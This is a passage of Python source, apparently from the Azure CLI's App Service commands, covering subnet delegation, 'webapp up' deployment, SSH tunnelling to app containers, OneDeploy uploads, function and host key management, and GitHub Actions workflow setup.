"resourceGroup": subnet_info["resource_group_name"],
"subnetResourceId": subnet_info["subnet_resource_id"]
}
def _vnet_delegation_check(cmd, subnet_subscription_id, vnet_resource_group, vnet_name, subnet_name):
from azure.cli.core.commands.client_factory import get_subscription_id
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
vnet_client = network_client_factory(cmd.cli_ctx)
if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
logger.warning('To manually add a delegation, use the command: az network vnet subnet update '
'--resource-group %s '
'--name %s '
'--vnet-name %s '
'--delegations Microsoft.Web/serverFarms', vnet_resource_group, subnet_name, vnet_name)
else:
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
# If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
app_service_environment=None):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription if updating an existing app. If creating "
"a new app, app names must be globally unique. Please try a more unique name or "
"leave unspecified to receive a randomly generated name.".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation. For more information on default behaviors, "
"see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
.format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(user, resource_group_name)
_create_new_rg = not check_resource_group_exists(cmd, rg_name)
plan = get_plan_to_use(cmd=cmd,
user=user,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc,
app_service_environment=app_service_environment)
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception: # pylint: disable=broad-except
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
match = helper.resolve(runtime_version)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match['configs']['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
# may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match['configs'].items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
settings.append('%s=%s', k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match['configs'].items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e: # pylint: disable=broad-except
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
.format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202 or response.status_code == 200:
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. Please wait until that process is complete before "
"starting a new deployment. You can track the ongoing deployment at {}"
.format(deployment_status_url))
# check if an error occured during deployment
if response.status_code:
raise CLIError("An error occured during deployment. Status Code: {}, Details: {}"
.format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
try:
c.run('cat /etc/motd', pty=True)
except invoke.exceptions.UnexpectedExit:
# Don't crash over a non-existing /etc/motd.
pass
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
if not instance:
open_page_in_browser(scm_url + '/webssh/host')
else:
open_page_in_browser(scm_url + '/webssh/host?instance={}'.format(instance))
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot, key=key_info)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
key_info)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches
branch='master', login_with_github=False, force=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise ResourceNotFoundError(
"The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
"was not found." % (name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError(
"Unable to retrieve details of the existing app %s. Please check that the app is a part of "
"the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
"value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
parsed_plan_id = parse_resource_id(app_details.server_farm_id)
client = web_client_factory(cmd.cli_ctx)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
is_linux = plan_info.reserved
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Verify runtime
app_runtime_info = _get_app_runtime_info(
cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
app_runtime_string = None
if(app_runtime_info and app_runtime_info['display_name']):
app_runtime_string = app_runtime_info['display_name']
github_actions_version = None
if (app_runtime_info and app_runtime_info['github_actions_version']):
github_actions_version = app_runtime_info['github_actions_version']
if runtime and app_runtime_string:
if app_runtime_string.lower() != runtime.lower():
logger.warning('The app runtime: {app_runtime_string} does not match the runtime specified: '
'{runtime}. Using the specified runtime {runtime}.')
app_runtime_string = runtime
elif runtime:
app_runtime_string = runtime
if not app_runtime_string:
raise CLIError('Could not detect runtime. Please specify using the --runtime flag.')
if not _runtime_supports_github_actions(runtime_string=app_runtime_string, is_linux=is_linux):
raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
# Get workflow template
logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
# Fill workflow template
guid = str(uuid.uuid4()).replace('-', '')
publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
logger.warning(
'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
name, branch, github_actions_version, slot if slot else 'production')
completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
branch=branch, slot=slot, publish_profile=publish_profile_name,
version=github_actions_version)
completed_workflow_file = completed_workflow_file.encode()
# Check if workflow exists in repo, otherwise push
if slot:
file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
else:
file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
if existing_publish_profile_name:
completed_workflow_file = completed_workflow_file.decode()
completed_workflow_file = completed_workflow_file.replace(
publish_profile_name, existing_publish_profile_name)
completed_workflow_file = completed_workflow_file.encode()
publish_profile_name = existing_publish_profile_name
logger.warning("Existing workflow file found")
if force:
logger.warning("Replacing the existing workflow file")
